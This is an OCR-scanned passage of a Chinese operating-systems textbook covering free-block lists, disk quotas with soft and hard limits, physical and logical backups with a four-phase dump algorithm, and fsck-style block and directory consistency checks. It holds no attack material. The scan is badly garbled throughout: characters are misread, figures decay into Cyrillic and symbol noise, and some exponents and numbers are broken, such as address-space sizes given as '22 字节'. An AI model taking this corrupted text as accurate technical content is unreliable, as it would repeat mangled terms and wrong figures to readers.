我 们 仍旧 不 清楚 是 否 这 些 数据 也 可 以 代表 家 用 计算 机 、 公 司 计算 机 、 政 府 计算 机 及 其 他 。 经 过 一 些 努 力 
我 们 也 许可 以 获取 一 些 其 他 种 类 计算 机 的 样本 ， 但 即使 那样 ，( 就 赁 这 些 数据 来 ) 推断 那 种 测量 适用 于 
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所 有 计算 机 也 是 愚蠢 的 。 
现在 回 到 空闲 表 方法 ， 只 需要 在 内 存 中 保存 一 个 指针 块 。 当 文件 创建 时 ， 所 需要 的 块 从 指针 块 中 取 
出 。 现 有 的 指针 块 用 完 时 ， 从 磁盘 中 读 入 一 个 新 的 指针 块 。 类 似 地 ， 当 删除 文件 时 ， 其 磁盘 块 被 释放 ， 
并 添加 到 内 存 的 指针 块 中 。 当 这 个 块 填 满 时 ， 就 把 它 写 人 磁盘 。 
在 某 些 特定 情形 下 ， 这 个 方法 产生 了 不 必要 的 磁盘 UO。 考 虑 图 4-23a 中 的 情形 ， 内 存 中 的 指针 块 只 
有 两 个 表 项 了 。 如 果 释 放 了 一 个 有 三 个 磁盘 块 的 文件 ， 该 指针 块 就 溢出 了 ， 必 须 将 其 写 和 磁盘， 这 就 产 
生 了 图 4-23b 的 情形 。 如 果 现 在 写 人 含有 三 个 块 的 文件 ， 满 的 指针 块 不 得 不 再 次 读 入 ， 这 将 回 到 图 4-23a 的 
情形 。 如 果 有 三 个 块 的 文件 只 是 作为 临时 文件 被 写 人 ， 当 它 被 释放 时 ， 就 需要 另 一 个 磁盘 写 操作 ， 以 便 
把 满 的 指针 块 写 回 磁 盘 。 总 之 ， 当 指针 块 几乎 为 空 时 ， 一 系列 短期 的 临时 文件 就 会 引起 大 量 的 磁盘 1/O。 
磁盘 
内 存 f 
і БРЗЕ: 


ШОШ 


а) b) 


图 4-23 а) 在 内 存 中 一 个 被 指向 空闲 磁盘 块 的 指针 几乎 充满 的 块 ， 以 及 磁盘 上 三 个 指针 块 ，b) 释放 
一 个 有 三 个 块 的 文件 的 结果 ，c) 处 理 该 三 个 块 的 文件 的 替代 策略 
( 带 阴影 的 表 项 代表 指向 空闲 磁盘 块 的 指针 ) 


一 个 可 以 避免 过 多 磁盘 IO 的 替代 策略 是 ， 拆 分 满 了 的 指针 块 。 这 样 ， 当 释放 三 个 块 时 ， 不 再 是 从 
图 4-23a 变 化 到 图 4-23b， 而 是 从 图 4-23a 变 化 到 图 4-23c。 现 在 ， 系 统 可 以 处 理 一 系列 临时 文件 ， 而 不 需 
进行 任何 磁盘 MO。 如 果 内 存 中 指针 块 满 了 ， 就 写 人 磁盘 ， 半 满 的 指针 块 从 磁盘 中 读 入 。 这 里 的 思想 是 ， 
保持 磁盘 上 的 大 多 数 指针 块 为 满 的 状态 (减少 磁盘 的 使 用 ) 但 是 在 内 存 中 保留 一 个 半 满 的 指针 块 。 这 
样 ， 它 可 以 既 处 理 文件 的 创建 又 同时 处 理 文件 的 删除 操作 ， 而 不 会 为 空闲 表 进行 磁盘 IO。 

对 于 位 图 ， 在 内 存 中 只 保留 一 个 块 是 有 可 能 的 ， 只 有 在 该 块 满 了 或 空 了 的 情形 下 ， 才 到 磁盘 上 取 另 
一 块 。 这 样 处 理 的 附加 好 处 是 ， 通 过 在 位 图 的 单一 块 上 进行 所 有 的 分 配 操作 ， 磁盘 块 会 较为 紧密 地 聚集 
在 一 起 ， 从 而 减少 了 磁盘 臂 的 移动 。 由 于 位 图 是 一 种 固定 大 小 的 数据 结构 ， 所 以 如 果 内 核 是 (部 分 ) 分 
页 的 ， 就 可 以 把 位 图 放 在 虚拟 内 存 内 ， 在 需要 时 将 位 图 的 页 面 调 入 。 


БЕРҮҮ Т | 
为 了 防止 人 们 贪心 而 占有 太 多 的 磁盘 空间 ， 多 用 户 操作 系统 常常 提供 一 种 强制 性 磁盘 配额 机 制 。 其 
思想 是 系统 管理 员 分 给 每 个 用 户 拥有 文 。。 打开 文件 才 кеш 
件 和 块 的 最 大 数量 ， 操 作 系统 确保 每 个 Гин BARNI 
用 户 不 超过 分 给 他 们 的 配额 。 下 面 将 介 |e БЕП 
绍 一 种 典型 的 机 制 。 用 户 =8 ТЕТЯ 
当 用 户 打开 一 个 文件 时 ， 系 统 找到 | R HRANA || лаю 
文件 属性 和 磁盘 地 址 ， 并 把 它们 送 入 内 软文 件 限制 | (а 
存 中 的 打开 文件 表 。 其 中 一 个 属性 千 | 硬 文件 限制 | 
文件 所 有 者 是 谁 。 任 何 有 关 该 文件 大 小 | 文件 的 当前 编号 | 
的 增长 都 记 到 所 有 者 的 配额 上 。 І J | 利 余 文件 数 通知 | 
第 二 张 表 包 含 了 每 个 用 户 当前 打开 
文件 的 配额 记录 ， 即 使 是 其 他 人 打开 该 Т 7 
文件 也 一 样 。 这 张 表 如 图 4-24 所 示 ， 该 


表 的 内 容 是 从 被 打开 文件 的 所 有 者 的 磁 图 4-24 在 配额 表 中 记录 了 每 个 用 户 的 配额 
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盘 配 额 文件 中 提取 出 来 的 。 当 所 有 文件 关闭 时 ， 该 记录 被 写 回 配额 文件 。 

当 在 打开 文件 表 中 建立 一 新 表 项 时 ， 会 产生 一 个 指向 所 有 者 配额 记录 的 指针 ， 以 便 很 容易 找到 不 同 
的 限制 。 每 一 次 往 文件 中 添加 一 块 时 ， 文 件 所 有 者 所 用 数据 块 的 总 数 也 增加 ， 引 发 对 配额 硬 限 制 和 软 限 
制 检查 。 可 以 超出 软 限制 但 硬 限制 不 可 以 超出 。 当 已 达到 硬 限制 时 ， 再 往 文件 中 添加 内 容 将 引发 错误 。 
同时 ， 对 文件 数目 也 存在 着 类 似 的 检查 。 

当 用 户 试图 登录 时 ， 系 统 核查 配额 文件 ， 查 看 该 用 户 文件 数目 或 磁盘 块 数目 是 否 超过 软 限制 。 如 果 
超过 了 任 一 限制 ， 则 显示 一 个 敬告， 保存 的 警告 计数 减 1。 如 果 该 计数 已 为 0， 表 示 用 户 多 次 忽略 该 警告 ， 
因而 将 不 允许 该 用 户 登录 。 要 想 再 得 到 登录 的 许可 ， 就 必须 与 系统 管理 员 协商 。 

这 一 方法 具有 一 种 性 质 ， 即 只 要 用 户 在 退出 系统 前 消除 所 超过 的 部 分 ， 他 们 就 可 以 在 一 次 终端 会 话 
期 间 超过 其 软 限制 ， 但 无 论 什么 情况 下 都 不 能 超过 硬 限制 。 


4.4.2 文件 系统 备份 

比 起 计算 机 的 损坏 ， 文 件 系统 的 破坏 往往 要 精 糕 得 多 。 如 果 由 于 火灾 、 闪 电 电流 或 者 一 杯 咖啡 汉 在 
键盘 上 而 弄 坏 了 计算 机 ， 确 实 让 人 伤 透 脑筋 ， 而 且 又 要 花 上 一 笔 钱 ， 但 一 般 而 言 ， 更 换 非常 方便 。 只 要 
去 计算 机 商店 ， 便 宜 的 个 人 计算 机 在 短 短 一 个 小 时 之 内 就 可 以 更 换 (当然 ， 如 果 这 发 生 在 大 学 里 面 ， 则 
发 出 订单 需 3 个 委员 会 的 同意 ， 5 个 签字 要 花 90 天 的 时 间 ) 。 

”不管 是 硬件 或 软件 的 故障 ， 如 果 计 算 机 的 文件 系统 被 破坏 了 ， 人 恢复 全 部 信息 会 是 一 件 困难 而 又 费时 
的 工作 ， 在 很 多 情况 下 ， 是 不 可 能 的 。 对 于 那些 丢失 了 程序 、 文 档 、 客 户 文件 、 税 收 记录 、 数 据 库 、 市 场 
计划 或 者 其 他 数据 的 用 户 来 说 ， 这 不 音 为 一 次 大 的 灾难 。 尽管 文件 系统 无 法 防止 设备 和 介质 的 物理 损坏 ， 
但 它 至 少 应 能 保护 信息 。 直 接 的 办 法 是 制作 备份 。 但 是 备份 并 不 如 想象 得 那么 简单 。 让 我 们 开始 考察 。 

许多 人 都 认为 不 值得 把 时 间 和 精力 花 在 备份 文件 这 件 事 上 ， 直 到 某 一 天 磁盘 突然 崩溃 ， 他 们 才 意识 
到 事态 的 严重 性 。 不 过 现在 很 多 公司 都 意识 到 了 数据 的 价值 ， 常 常 把 数据 转 到 磁带 上 存储 ， 并 且 每 天 至 
少 做 一 次 备份 。 现 在 磁带 的 容量 大 至 几 十 其 至 几 百 GB， 而 每 个 GB 仅仅 需要 几 美 分 。 其 实 ， 做 备份 并 不 
像 人 们 说 得 那么 烦琐 ， 现 在 就 让 我 们 来 看 -下 相关 的 要 点 。 

做 磁带 备份 主要 是 要 处 理 好 两 个 潜在 问题 中 的 一 个 : 

D 从 意外 的 灾难 中 恢复 。 

2) 从 错误 的 操作 中 恢复 。 

第 一 个 问题 主要 是 由 磁盘 破裂 、 火 灾 、 洪 水 等 自然 灾害 引起 的 。 事 实 上 这 些 情形 并 不 多 见 ， 所 以 许 
多 人 也 就 不 以 为 然 。 这 些 人 往往 也 是 以 同样 的 原因 忽略 了 自家 的 火灾 保险 。 

第 二 个 原因 主要 是 用 户 意外 地 删除 了 原本 还 需要 的 文件 。 这 种 情况 发 生得 很 频繁 ， 使 得 Windows 的 
设计 者 们 针对 “删除 ”命令 专门 设计 了 特殊 目录 一 一 “回收 站 "， 也 就 是 说 ， 在 人 们 删除 文件 的 时 候 ， 文 
件 本 身 并 不 真正 从 磁盘 上 消失 ， 而 是 被 放置 到 这 个 特殊 目录 下 ， 待 以 后 需要 的 时 候 可 以 还 原 回去 。 文 件 
备份 更 主要 是 指 这 种 情况 ， 这 就 允许 几 天 之 前 ， 甚 至 几 个 星期 之 前 的 文件 都 能 从 原来 备份 的 磁带 上 还 原 。 

为 文件 做 备份 既 耗 时 间 又 费 空间 ， 所 以 需要 做 得 又 快 又 好 ， 这 一 点 很 重要 。 基 于 上 述 考虑 我 们 来 看 
看 下 面 的 问题 。 首 先 ， 是 要 备份 整个 文件 系统 还 是 仅 备份 一 部 分 呢 ? 在 许多 安装 配置 中 ， 可 执行 程序 
(二 进 制 代码 ) 放置 在 文件 系统 树 的 受 限制 部 分 ， 所 以 如 果 这 些 文件 能 直接 从 厂商 提供 的 CD-ROM 盘 上 
重新 安装 的 话 ， 也 就 没有 必要 为 它们 做 备份 。 此 外 ， 多 数 系统 都 有 专门 的 临时 文件 目录 ， 这 个 目录 也 不 
需要 备份 。 在 UNIX 系 统 中 ， 所 有 的 特殊 文件 (也 就 是 1/O 设 备 ) 都 放置 在 /dev 目 录 下 ， 对 这 个 目录 做 备 
份 不 仅 没 有 必要 而 且 还 十 分 危险 一 因为 一 旦 进行 备份 的 程序 试图 读 取 其 中 的 文件 ， 备 份 程序 就 会 永久 
挂 起 。 简 而 言 之 ， 合 理 的 做 法 是 只 备份 特定 目录 及 其 下 的 全 部 文件 ， 而 不 是 备份 整个 文件 系统 。 

其 次 ， 对 前 一 次 备份 以 来 没有 更 改过 的 文件 再 做 备份 是 一 种 浪费 ， 因 而 产生 了 增 量 转 储 的 思想 。 最 
简单 的 增 量 转 储 形式 就 是 周期 性 地 (每 周一 次 或 每 月 一 次 ) 做 全 面 的 转 储 (备份 )， 而 每 天 只 对 当天 更 
改 的 数据 做 备份 。 稍 微 好 一 点 的 做 法 只 备份 自 最 近 一 次 转 储 以 来 更 改过 的 文件 。 当 然 了 ， 这 种 做 法 极 大 
地 缩减 了 转 储 时 间 ， 但 操作 起 来 却 更 复杂 ， 因 为 最 近 的 全 面 转 储 先 要 全 部 恢复 ， 随 后 按 逆序 进行 增 量 转 
储 。 为 了 方便 ， 人 们 往往 使 用 更 复杂 的 增 量 转 储 模式 。 

第 三 ， 既 然 待 转 储 的 往往 是 海量 数据 ， 那 么 在 将 其 写 入 磁带 之 前 对 文件 进行 压缩 就 很 有 必要 。 可 是 
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对 许多 压缩 算法 而 言 ， 备 份 磁带 上 的 单个 坏 点 就 能 破坏 解压 缩 算 法 ， 并 导致 整个 文件 甚至 整个 磁带 无 法 
阅读 。 所 以 是 否 要 对 备份 文件 流 进行 压缩 必须 慎重 考虑 。 

第 四 ， 对 活动 文件 系统 做 备份 是 很 难 的 。 因 为 在 转 储 过 程 中 添加 、 删 除 或 修改 文件 和 目录 可 能 会 导 
致 文件 系统 的 不 一 致 性 。 不 过 ， 既 然 转 储 一 次 需要 几 个 小 时 ， 那 么 在 晚上 大 部 分 时 间 让 文件 系统 脱 机 是 
很 有 必要 的 ， 虽 然 这 种 做 法 有 时 会 邻 人 难以 接受 。 正 因 如 此 ， 人 们 修改 了 转 储 算法 ， 记 下 文件 系统 的 瞬 
时 状态 ， 即 复制 关键 的 数据 结构 ， 然 后 需要 把 将 来 对 文件 和 目录 所 做 的 修改 复制 到 块 中 ， 而 不 是 处 处 更 
新 它们 (Hutchinson 等 人 ，1999)。 这 样 ， 文 件 系统 在 抓 取 快照 的 时 候 就 被 有 效 地 冻结 了 ， 留 待 以 后 空 
闲 时 再 备份 。 

第 五 ， 即 最 后 一 个 问题 ， 做 备份 会 给 一 个 单位 引入 许多 非 技术 性 问题 。 如 果 当 系统 管理 员 下 楼 去 取 
打印 文件 ， 而 毫 无 防备 地 把 备份 磁带 摘 置 在 办 公 室 里 的 时 候 ， 就 是 世界 上 最 棒 的 在 线 保安 系统 也 会 失去 
作用 。 这 时 ， 一 个 间谍 所 要 做 的 只 是 潜入 办 公 室 、 将 一 个 小 磁带 放 入 口袋 ， 然 后 绅士 般 地 离开 。 再 见 吧 
保安 系统 。 即 使 每 天 都 做 备份 ， 如 果 碰 上 一 场 大 火烧 光 了 计算 机 和 所 有 的 备份 磁带 ， 那 做 备份 又 有 什么 
意义 呢 ? 由 于 这 个 原因 ， 所 以 备份 磁带 应 该 远离 现场 存放 ， 不 过 这 又 带 来 了 更 多 的 安全 风险 (因为 ， 现 
在 必须 保护 两 个 地 点 了 )。 关 于 此 问题 和 管理 中 的 其 他 实际 问题 ， 请 参考 (Nemeth 等 人 ，2000)。 接 下 
来 我 们 只 讨论 文件 系统 备份 所 涉及 的 技术 问题 。 

转 储 磁盘 到 磁带 上 有 两 种 方案 : 物理 转 储 和 逻辑 转 储 。 物 理 转 储 是 从 磁盘 的 第 0 块 开 始 ， 将 全 部 的 
磁盘 块 按 序 输出 到 磁带 上 ， 直 到 最 后 一 块 复制 完毕 。 此 程序 很 简单 ， 可 以 确保 万 无 一 失 ， 这 是 其 他 任何 
实用 程序 所 不 能 比 的 。 

不 过 有 几 点 关于 物理 转 储 的 评价 还 是 值得 一 提 的 。 首 先 ， 未 使 用 的 磁盘 块 无 须 备份 。 如 果 转 储 程序 

能 够 得 到 访问 空间 块 的 数据 结构 ， 就 可 以 避免 该 程序 备份 未 使 用 的 磁盘 块 。 但 是 ， 既 然 磁带 上 的 第 块 
并 不 代表 磁盘 上 的 第 k 块 ， 那 么 要 想 略 过 未 使 用 的 磁盘 块 就 需要 在 每 个 磁盘 块 前 边 写 下 该 磁盘 块 的 号 码 
(或 其 他 等 效 数据 ) 。 
二 个 需要 关注 的 是 坏 块 的 转 储 。 制 造 大 型 磁盘 而 没有 任何 瑕 症 儿 乎 是 不 可 能 的 ， 总 是 有 一 些 坏 块 
存在 。 有 时 进行 低级 格式 化 后 ， 坏 块 会 被 检测 出 来 ， 标 记 为 坏 的 ， 并 被 应 对 这 种 紧急 状况 的 在 每 个 轨道 
末端 的 一 些 空闲 块 所 替换 。 在 很 多 情况 下 ， 磁 盘 控 制 器 处 理 坏 块 的 赫 换 过 程 是 透明 的 ， 甚 至 操作 系统 也 
不 知道 。 

然而 ， 有 时 格式 化 后 块 也 会 变 坏 ， 在 这 种 情况 下 操作 系统 可 以 检测 到 它们 。 通 常 ， 可 以 通过 建立 一 
个 包含 所 有 坏 块 的 “文件 ”来 解决 这 个 问题 一 一 只 要 确保 它们 不 会 出 现在 空闲 块 池 中 并 且 决 不 会 被 分 配 。 
不 用 说 ， 这 个 文件 是 完全 不 能 够 读 取 的 。 

如 果 磁 盘 控 制 器 将 所 有 坏 块 重新 映射 ,并 对 操作 系统 隐藏 的 话 , 物理 转 储 工作 还 是 能 够 顺利 进行 的 。 
另 一 方面 ， 如 果 这 些 坏 块 对 操作 系统 可 见 并 映射 到 在 一 个 或 几 个 坏 块 文件 或 者 位 图 中 ， 那 么 在 转 储 过 程 
中 ， 物 理 转 储 程序 绝对 有 必要 能 访问 这 些 信息 ， 并 避免 转 储 之 ， 从 而 防止 在 对 坏 块 文件 备份 时 的 无 止境 
磁盘 读 错 误 发 生 。 

物理 转 储 的 主要 优点 是 简单 、 极 为 快速 (基本 上 是 以 磁盘 的 速度 运行 )。 主 要 缺点 是 ， 既 不 能 跳 过 
选 定 的 目录 ， 也 无 法 增 量 转 储 ， 还 不 能 满足 恢复 个 人 文件 的 请 求 。 正 因 如 此 ， 绝 大 多 数 配 置 都 使 用 逻辑 
ий. 

ИНИНЕН ЖШ, ЖОНИНЕ ЕП ЛЕ АЦЕ Н ЯЯ (Бш, ВЗН ЕВЕ 
或 全 面 系统 转 储 的 日 期 ) 后 有 所 更 改 的 全 部 文件 和 目录 。 所 以 ， 在 逻辑 转 储 中 ， 转 储 磁带 上 会 有 一 连 串 
精心 标识 的 目录 和 文件 ， 这 样 就 很 容易 满足 恢复 特定 文件 或 目录 的 请 求 。 

既然 逻辑 转 储 是 最 为 普遍 的 形式 ， 就 让 我 们 以 图 4-25 为 例 来 仔细 研究 一 个 通用 算法 。 该 算法 在 
UNIX 系 统 上 广 为 使 用 。 在 图 中 可 以 看 到 一 棵 由 目录 ( 方 框 ) 和 文件 (ШШ) 组 成 的 文件 树 。 被 阴影 获 
盖 的 项 目 代 表 自 基准 日 期 以 来 修改 过 ， 因 此 需要 转 储 ， 无 阴影 的 则 不 需要 转 储 。 

该 算法 还 转 储 通 向 修改 过 的 文件 或 目录 的 路 径 上 的 所 有 目录 (甚至 包括 未 修改 的 目录 )， 原 因 有 二 。 
其 一 是 为 了 将 这 些 转 储 的 文件 和 目录 恢复 到 另 一 台 计算 机 的 新 文件 系统 中 。 这 样 ， 转 储 程序 和 恢复 程序 
就 可 以 在 计算 机 之 间 进行 文件 系统 的 整体 转移 。 
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没有 改变 
的 目录 


图 4-25 待 转 储 的 文件 系统 ， 其 中 方 杠 代 表 目录 ， 贺 围 代表 文件 。 被 阴影 覆盖 的 项 目 
表示 自 上 次 转 储 以 来 修改 过 。 每 个 目录 和 文件 都 被 标 上 其 i 节 点 号 


转 储 被 修改 文件 之 上 的 未 修改 目录 的 第 二 个 原因 是 为 了 可 以 对 单个 文件 进行 增 量 恢复 (很 可 能 是 对 
愚 春 操 作 所 损坏 文件 的 恢复 )。 设 想 如 果 星 期 天 晚上 转 储 了 整个 文件 系统 ， 星 期 一 晚上 又 做 了 一 次 增 量 
转 储 。 在 星期 二 ，/usrjhs/proj/nr3 目 录 及 其 下 的 全 部 目录 和 文件 被 删除 了 。 星 期 三 一 大 早 用 户 又 想 恢复 
/usr/jhs/proj/nr3/plans/summary 文 件 。 但 因为 没有 设置 ， 所 以 不 可 能 单独 恢复 summary 文 件 。 必 须 首先 恢 
复 nr3 和 plans 这 两 个 目录 。 为 了 正确 获取 文件 的 所 有 者 、 模 式 、 时 间 等 各 种 信息 ， 这 些 目录 当然 必须 再 
次 备份 到 转 储 磁带 上 ， 尽 管 自 上 次 完整 转 储 以 来 它们 并 没有 修改 过 。 

逻辑 转 储 算法 要 维持 一 个 以 i 节 点 号 为 索引 的 位 图 ， 每 个 i 节 点 包含 了 几 位 。 随 着 算法 的 执行 ， 位 图 
中 的 这 些 位 会 被 设置 或 清除 。 算 法 的 执行 分 为 四 个 阶段 。 第 一 阶段 从 起 始 目录 (本 例 中 为 根 目录 ) 开始 
检查 其 中 的 所 有 目录 项 。 对 每 一 个 修改 过 的 文件 ， 该 算法 将 在 位 图 中 标记 其 i 节 点 。 算 法 还 标记 并 递归 
检查 每 一 个 目录 (不 管 是 否 修改 过 ) 。 

第 一 阶段 结束 时 ， 所 有 修改 过 的 文件 和 全 部 目录 都 在 位 图 中 标记 了 ， 如 图 4-26a 所 示 (以 阴影 标记 )。 
理论 上 说 来 ， 第 二 阶段 再 次 递归 地 遍历 目录 树 ， 并 去 掉 目 录 树 中 任何 不 包含 被 修改 过 的 文件 或 目录 的 目 
录 上 的 标记 。 本 阶段 的 执行 结果 如 图 4-26b 所 示 。 注 意 ，i 节 点 号 为 0、11、14、27、29 和 30 的 目录 此 时 
已 经 被 去 掉 标记 ， 因 为 它们 所 包含 的 内 容 没 有 做 任何 修改 。 它 们 因而 也 不 会 被 转 储 。 相 反 ，i 节 点 号 为 5 
和 6 的 目录 尽管 没有 被 修改 过 也 要 被 转 储 ， 因 为 到 新 的 机 器 上 恢复 当日 的 修改 时 需要 这 些 信息 。 为 了 提 
高 算法 效率 ， 可 以 将 这 两 阶段 的 目录 树 遍 历 合 二 为 一 。 
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图 4-26 逻辑 转 储 算法 所 使 用 的 位 图 


现在 哪些 目录 和 文件 必须 被 转 储 已 经 很 明确 了 ， 就 是 图 4-26b 中 所 标记 的 部 分 。 第 三 阶段 算法 将 以 
节点 号 为 序 ， 扫 描 这 些 i 节 点 并 转 储 所 有 标记 的 目录 ， 如 图 4-26c 所 示 。 为 了 进行 恢复 ， 每 个 被 转 储 的 目 
录 都 用 目录 的 属性 (所 有 者 、 时 间 等 ) 作为 前 组。 最 后 ， 在 第 四 阶段 ， 在 图 4-26d 中 被 标记 的 文件 也 被 
转 储 ， 同 样 ， 由 其 文件 属性 作为 前 级 。 至 此 ， 转 储 结束 。 
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从 转 储 磁带 上 恢复 文件 系统 很 容易 办 到 。 首 先 要 在 磁盘 上 创建 一 个 空 的 文件 系统 ， 然 后 恢复 最 近 一 
次 的 完整 转 储 。 由 于 磁带 上 最 先 出 现 目录 ， 所 以 首先 恢复 目录 ， 给 出 文件 系统 的 框架 ， 然 后 恢复 文件 本 
身 。 在 完整 转 储 之 后 的 是 增 量 转 储 ， 重 复 这 一 过 程 ， 以 此 类 推 。 

尽管 逻辑 转 储 十 分 简单 ， 还 是 有 几 点 琼 手 之 处 。 首 先 ， 既 然 空 闲 块 列表 并 不 是 一 个 文件 ， 那 么 在 所 
有 被 转 储 的 文件 恢复 完毕 之 后 ， 就 需要 从 零 开 始 重新 构造 。 这 一 点 可 以 办 到 ， 因 为 全 部 空闲 块 的 集合 恰 
好 是 包含 在 全 部 文件 中 的 块 集合 的 补 集 。 

另 一 个 问题 是 关于 连接 。 如 果 一 个 文件 被 连接 到 两 个 或 多 个 目录 中 ， 要 注意 在 恢复 时 只 对 该 文件 恢 
复 一 次 ， 然 后 要 恢复 所 有 指向 该 文件 的 目录 。 

还 有 一 个 问题 就 是 :UNIX 文件 实际 上 包含 了 许多 “空洞 "。 打 开 文 件 ， 写 几 个 字 节 ， 然 后 找到 文件 
中 一 个 偏 移 了 一 定 距 离 的 地 址 ， 又 写 入 更 多 的 字 节 ， 这 么 做 是 合法 的 。 但 两 者 之 间 的 这 些 块 并 不 属于 文 
件 本 身 ， 从 而 也 不 应 该 在 其 上 实施 转 储 和 恢复 操作 。 核 心 文件 通常 在 数据 段 和 堆栈 段 之 间 有 一 个 数 百 兆 
字 节 的 空洞 。 如 果 处 理 不 得 当 ， 每 个 被 恢复 的 核心 文件 会 以 “0” 填 充 这 些 区 域 ， 这 可 能 导致 该 文件 与 
虚拟 地 址 空间 一 样 大 (例如 ，22 字 节 ， 更 精 糕 可 能 会 达到 2“ 字 节 ) 。 

最 后 ， 无 论 属于 哪 一 个 目录 (它们 并 不 一 定局 限于 /dev 目 录 下 )， 特 殊 文件 、 命 名 管道 以 及 类 似 的 文 
件 都 不 应 该 转 储 。 关 于 文件 系统 备份 的 更 多 信息 ， 请 参考 (Chervenak ЗЕ Л, 1998; Zwicky, 1991), 

磁带 密度 不 会 像 磁 盘 密度 那样 改进 得 那么 快 。 这 会 逐渐 导致 备份 一 个 很 大 的 磁盘 需要 多 个 磁带 的 状 
况 。 当 磁带 机 器 人 可 以 自动 换 磁带 时 ， 如 果 这 种 趋势 继续 下 去 ， 作 为 一 种 备份 介质 ， 磁 带 会 最 终 变 得 太 
小 。 在 那 种 情况 下， 备份 一 个 磁盘 的 惟一 的 方式 是 在 另 一 个 磁盘 上 。 对 每 一 个 磁盘 直接 做 镜像 是 一 种 方 
式 。 一 个 更 加 复杂 的 方案 ， 称 为 RAID ， 将 会 在 第 5 章 讨论 。 


4.4.3 文件 系统 的 一 致 性 

影响 文件 系统 可 靠 性 的 另 一 个 问题 是 文件 系统 的 一 致 性 。 很 多 文件 系统 读 取 磁 盘 块 ， 进 行 修改 后 ， 
再 写 回 磁盘 。 如 果 在 修改 过 的 磁盘 块 全 部 写 回 之 前 系统 崩溃 ， 则 文件 系统 有 可 能 处 于 不 一 致 状态 。 如 果 
一 些 未 被 写 回 的 块 是 i 节 点 块 、 目 录 块 或 者 是 包含 有 空闲 表 的 块 时 ， 这 个 问题 万 为 严重 。 

为 了 解决 文件 系统 的 不 一 致 问题 , 很 多 计算 机 都 带 有 一 个 实用 程序 以 检验 文件 系统 的 一 致 性 。 例 如 ， 
UNIX 有 fsck， 而 Windows 用 scandisk。 系 统 启动 时 ， 特 别 是 崩溃 之 后 的 重新 启动 ， 可 以 运行 该 实用 程序 。 
下 面 我 们 介绍 在 UNIX 中 这 个 fsck 实 用 程序 是 怎样 工作 的 。scandisk 有 所 不 同 ， 因 为 它 工作 在 另 一 种 文件 
系统 上 ， 不 过 运用 文件 系统 的 内 在 元 余 进 行 修复 的 一 般 原 理 仍然 有 效 。 所 有 文件 系统 检验 程序 可 以 独立 
地 检验 每 个 文件 系统 磁盘 分 区 ) 的 一 致 性 。 

一 致 性 检查 分 为 两 种 : 块 的 一 致 性 检查 和 文件 的 一 致 性 检查 。 在 检查 块 的 一 致 性 时 ， 程 序 构造 两 张 
表 ， 每 张 表 中 为 每 个 块 设立 一 个 计数 器 ， 都 初始 化 为 0。 第 一 个 表 中 的 计数 器 跟踪 该 块 在 文件 中 的 出 现 
次 数 ， 第 二 个 表 中 的 计数 器 跟踪 该 块 在 空闲 表 中 的 出 现 次 数 。 

接着 检验 程序 使 用 原始 设备 读 取 全 部 的 i 节 点 ， 忽 略 文件 的 结构 ， 只 返回 所 有 的 磁盘 块 ， 从 0 开始 。 
由 i 节 点 开始 ， 可 以 建立 相应 文件 中 采用 的 全 部 块 的 块 号 表 。 每 当 读 到 一 个 块 号 时 ， 该 块 在 第 一 个 表 中 
的 计数 器 加 1。 然 后 ， 该 程序 检查 空闲 表 或 位 图 ， 查 找 全 部 未 使 用 的 块 。 每 当 在 空闲 表 中 找到 一 个 块 时 ， 
就 会 使 它 在 第 二 个 表 中 的 相应 计数 器 加 1。 

如 果 文件 系统 一 致 ， 则 每 一 块 或 者 在 第 一 个 表 计数 器 中 为 1， 或 者 在 第 二 个 表 计 数 器 中 为 1， 如 图 
4-27a 所 示 。 但 是 当 系统 崩溃 后 , 这 两 张 表 可 能 如 图 4-27b 所 示 ， 其 中, 磁盘 块 2 没有 出 现在 任何 一 张 表 中 ， 
这 称 为 块 丢失 。 尽 管 块 丢失 不 会 造成 实际 的 损害 ,但 它 的 确 浪费 了 磁盘 空间 ， 减 少 了 磁盘 容量 。 块 丢失 
问题 的 解决 很 容易 :文件 系统 检验 程序 把 它们 加 到 空 闪 表 中 即 可 。 

有 可 能 出 现 的 另 一 种 情况 如 图 4-27c 所 示 。 其 中 ， 块 4 在 空闲 表 中 出 现 了 2 次 (只 在 空 闪 表 是 真正 意 
义 上 的 一 张 表 时 ， 才 会 出 现 重复 ， 在 位 图 中 ， 不 会 发 生 这 类 情况 ) 。 解 决 方法 也 很 简单 ， 只 要 重新 建立 
空闲 表 即 可 。 

最 精 的 情况 是 ， 在 两 个 或 多 个 文件 中 出 现 同一 个 数据 块 ， 如 图 4-27d 中 的 块 5。 如 果 其 中 一 个 文件 被 
删除 ， 块 5 会 添加 到 空闲 表 中 ， 导 致 一 个 块 同时 处 于 使 用 和 空闲 两 种 状态 。 若 删除 这 陋 个 文件 ， 那 么 在 
空闲 表 中 这 个 磁盘 块 会 出 现 两 次 。 
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块 号 块 号 
012345678 9101112131415 012345678 9101112131415 


[оо 11 1:11] 使 用 的 块 (Т ӘТ 111 1:197) венә 
oooooocooocooooocoi Eces oooooocooooocooii 空间 块 


а) b) 


01234567 8 9101112131415 012345678 9101112131415 
[оо о] emee 2911005) wm 


ooooanooonocooni жн еррор рр: 空闲 块 


©) 4) 
图 4-27 文件 系统 状态 : a) 一 致 ，b) 块 丢失 ，c) 空闲 表 中 有 重复 块 ，d) 重复 数据 块 


文件 系统 检验 程序 可 以 采取 相应 的 处 理 方法 是 ， 先 分 配 一 空闲 块 ， 把 块 5 中 的 内 容 复制 到 空闲 块 中 ， 
然后 把 它 插 到 其 中 一 个 文件 之 中 。 这 样 文件 的 内 容 未 改变 (虽然 这 些 内 容 几 乎 可 以 肯定 是 不 对 的 )， 但 
至 少 保持 了 文件 系统 的 一 致 性 。 这 一 错误 应 该 报告 ， 由 用 户 检查 文件 受 损 情况 。 

除 检查 每 个 磁盘 块 计数 的 正确 性 之 外 ， 文 件 系统 检验 程序 还 检查 目录 系统 。 此 时 也 要 用 到 一 张 计数 
器 表 ， 但 这 时 是 一 个 文件 〈 而 不 是 一 个 块 ) 对 应 于 一 个 计数 器 。 程 序 从 根 目录 开始 检验 ， 沿 着 目录 树 弟 
归 下 降 ， 检 查 文件 系统 中 的 每 个 目录 。 对 每 个 目录 中 的 每 个 文件 ， 将 文件 使 用 计数 器 加 1。 要 注意 ， 由 
于 存在 硬 连 接 ， 一 个 文件 可 能 出 现在 两 个 或 多 个 目录 中 。 而 遇 到 符号 连接 是 不 计数 的 ， 不 会 对 目标 文件 
的 计数 器 加 1。 

在 检验 程序 全 部 完成 后 ， 得 到 一 张 由 i 节 点 号 索引 的 表 ， 说 明 每 个 文件 被 多 少 个 目录 包含 。 然 后 ， 
